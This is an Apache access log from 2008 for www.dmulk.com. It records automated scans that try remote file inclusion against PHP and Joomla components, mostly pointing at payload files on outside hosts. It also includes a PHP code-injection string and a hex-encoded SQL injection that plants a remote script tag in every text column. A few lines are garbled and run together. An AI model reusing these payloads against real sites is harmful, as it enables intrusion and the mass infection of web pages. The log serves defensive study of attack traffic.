86.58.154.237 - - [18/Aug/2008:11:08:33 -0700] "GET /logs/access_080530.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [18/Aug/2008:11:08:47 -0700] "GET /bikes/dteel/2008_02_15/ HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.149.226.176 - - [18/Aug/2008:11:09:19 -0700] "GET /logs/access_080725.log//cache/errors.php?error=http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.67.123 - - [18/Aug/2008:11:09:33 -0700] "GET /logs/access_080530.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [18/Aug/2008:11:09:33 -0700] "GET /head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [18/Aug/2008:11:09:34 -0700] "GET /logs/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:11:20 -0700] "GET /logs/errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:11:20 -0700] "GET /errors.php?error=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [18/Aug/2008:11:11:27 -0700] "GET /logs/access_080627.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.63.13 - - [18/Aug/2008:11:11:49 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.26.63.13 - - [18/Aug/2008:11:11:49 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:12:44 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:12:44 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.58.154.237 - - [18/Aug/2008:11:12:57 -0700] "GET /logs/access_080627.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:14:03 -0700] "GET /logs/access_080806.log/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:14:03 -0700] "GET /logs/index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [18/Aug/2008:11:14:04 -0700] "GET /index.php?content=http://www.hatcon.com.sa/phpnuke/ultramode.txt??? HTTP/1.1" 200 10982 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [18/Aug/2008:11:14:05 -0700] "GET /logs/doceboLms//class/class.admin_menu_lms.php?where_framework=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [18/Aug/2008:11:14:05 -0700] "GET /doceboLms//class/class.admin_menu_lms.php?where_framework=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:14:15 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:14:15 -0700] "GET /phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:14:16 -0700] "GET /logs/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:14:35 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.64.112.75 - - [18/Aug/2008:11:14:35 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:14:56 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.189.205 - - [18/Aug/2008:11:14:56 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:15:48 -0700] "GET /logs/access_080808.log//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:15:48 -0700] "GET //errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:15:49 -0700] "GET /logs//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:17:12 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:17:12 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:17:30 -0700] "GET /logs/access_080725.log//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:11:17:40 -0700] "GET /logs/access_080615.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:11:17:41 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 10980 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:11:17:42 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 200 61146 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:17:44 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:17:44 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:11:17:55 -0700] "GET /logs/access_080125.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:11:17:55 -0700] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [18/Aug/2008:11:17:56 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:11:19:21 -0700] "GET /logs/access_080530.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:11:19:36 -0700] "GET /logs/access_080125.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:11:19:36 -0700] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:19:38 -0700] "GET /logs/access_080626.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:19:38 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:19:38 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.69.246.191 - - [18/Aug/2008:11:19:41 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:45 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 10965 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:47 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:48 -0700] "GET //index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 10949 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:50 -0700] "GET /logs/access_080305.log/index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:50 -0700] "GET /logs/access_080305.log/index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:50 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:51 -0700] "GET /index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 200 10978 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:51 -0700] "GET /logs/index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:19:52 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:52 -0700] "GET /index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 200 10978 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.80.16 - - [18/Aug/2008:11:19:52 -0700] "GET /logs/index.php?command=http://lodossisland.free.fr/shoot/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.185.89 - - [18/Aug/2008:11:19:58 -0700] "GET /logs/access_080131.log%20/scanhttp://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.28 - - [18/Aug/2008:11:20:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.28 - - [18/Aug/2008:11:20:01 -0700] "GET /tmp/sess_629fcbb718d189bdffb1383e75cf6ed0 HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.179.1.160 - - [18/Aug/2008:11:20:04 -0700] "GET /logs/access_080213.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432Banurse2retire/us1:24.14491.179.1.160 - - [18/Aug/2008:11:20:06 -0700] "GET /logs/access_080213.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432mgwaycorp/us1:67.149.55.80.247.64.150 - - [18/Aug/2008:11:20:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:16 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:17 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:26 -0700] "GET /logs/access_080308.log/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:26 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:27 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:20:59 -0700] "GET /logs/access_080626.log/phphtml.php?htmlclass_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:11:21:29 -0700] "GET /logs/access_080125.log//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:11:21:29 -0700] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [18/Aug/2008:11:21:35 -0700] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://veldink.com/leqi/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:21:41 -0700] "GET /logs/access_080806.log/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.179.1.160 - - [18/Aug/2008:11:21:47 -0700] "GET /logs/access_080219.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432vakrause@sbcglobal.net/u91.179.1.160 - - [18/Aug/2008:11:22:15 -0700] "GET /logs/access_080219.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432Bbenson.tseng@att.net/us1140.117.241.99 - - [18/Aug/2008:11:22:54 -0700] "GET /logs/access_080313.log/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:55 -0700] "GET /logs/access_080313.log/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:56 -0700] "GET /?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 10947 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:56 -0700] "GET /?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 10947 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:57 -0700] "GET /logs/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:57 -0700] "GET /logs/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:22:58 -0700] "GET /logs/?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 61141 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:01 -0700] "GET /?sourcedir=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 200 10947 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:23:12 -0700] "GET /logs/access_080724.log//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:23:13 -0700] "GET //errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.84.19.133 - - [18/Aug/2008:11:23:13 -0700] "GET /logs/access_080530.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [18/Aug/2008:11:23:13 -0700] "GET /logs//errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:17 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:17 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:17 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:18 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:23:19 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.247.64.150 - - [18/Aug/2008:11:23:21 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:11:24:02 -0700] "GET //include/admin.php?rd=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:11:24:02 -0700] "GET /logs/access_080309.log//include/admin.php?rd=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:11:24:02 -0700] "GET /logs//include/admin.php?rd=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.169.165.173 - - [18/Aug/2008:11:24:16 -0700] "GET /logs/access_080714.log//?_SERVER[DOCUMENT_ROOT]=http://www.gantoo.com/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [18/Aug/2008:11:24:17 -0700] "GET /logs/access_080211.log//include/admin.php?rd=http://ellanaturner.com/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:25:00 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.117.241.99 - - [18/Aug/2008:11:25:01 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://c0d3d57.t35.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.226 - - [18/Aug/2008:11:25:20 -0700] "GET /logs/access_080627.log/head.php?adresa=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:11:25:32 -0700] "GET /logs/atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [18/Aug/2008:11:25:33 -0700] "GET /atom.php5?page=http://www.felixtur.com.br/principal/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:11:25:38 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [18/Aug/2008:11:25:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://esmakoken.com/valeandart/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
